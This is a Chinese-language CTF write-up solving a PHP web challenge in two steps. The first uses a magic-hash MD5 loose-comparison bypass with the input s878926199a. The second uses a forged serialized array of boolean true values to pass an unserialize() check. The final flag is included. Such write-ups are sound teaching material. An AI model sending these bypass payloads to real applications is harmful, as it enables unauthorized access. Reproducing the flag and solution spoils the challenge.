0x01 ==
这道题确实可以学习很多新的知识.点进去以后,点了几下登入系统并没有什么用.
F12,在注释里面看到了一句话
<!-- $test=$_GET['username']; $test=md5($test); if($test=='0') -->
用户名经过md5加密后与'0'进行比较.又是==号.==号不会检查表达式的类型. 比较的时候会把含有数字的字符串转换成数值类型比较. 如果参数是字符串,会将后面的不是数字的字符串丢弃,返回前面的数字.
比如'243aaaa'返回243. 而且对于'0e123'会转为科学计数法类型.所以我们只要找到一个字符串MD5加密后以0开头就行. 这里使用 s878926199a
在用户名处输入,下方显示,继续访问.
/user.php?fame=hjkleffifer
0x02 序列化
进去以后,有一行代码.意思就是将password反序列化后得到一个数组,数组里的user和pass的值和某字符串相等就显示flag.
$unserialize_str = $_POST['password']; $data_unserialize = unserialize($unserialize_str); if ($data_unserialize['user'] == '???' && $data_unserialize['pass'] == '???') { print_r($flag); } 伟大的科学家php方言道:成也布尔,败也布尔。 回去吧骚年
但是我们并不知道字符串是什么,下面的话提醒我们使用布尔.bool类型的true和任意字符串 用==比较都相等.所以我们就构造一个序列化后的数组.
让user和pass的值都为true.
<?php $array = array(); $array['user'] = true; $array['pass']=true; $a = serialize($array); echo $a; ?>
得到一个序列化后的数组
a:2:{s:4:"user";b:1;s:4:"pass";b:1;}
在password处输入得到flag
ctf{dwduwkhduw5465}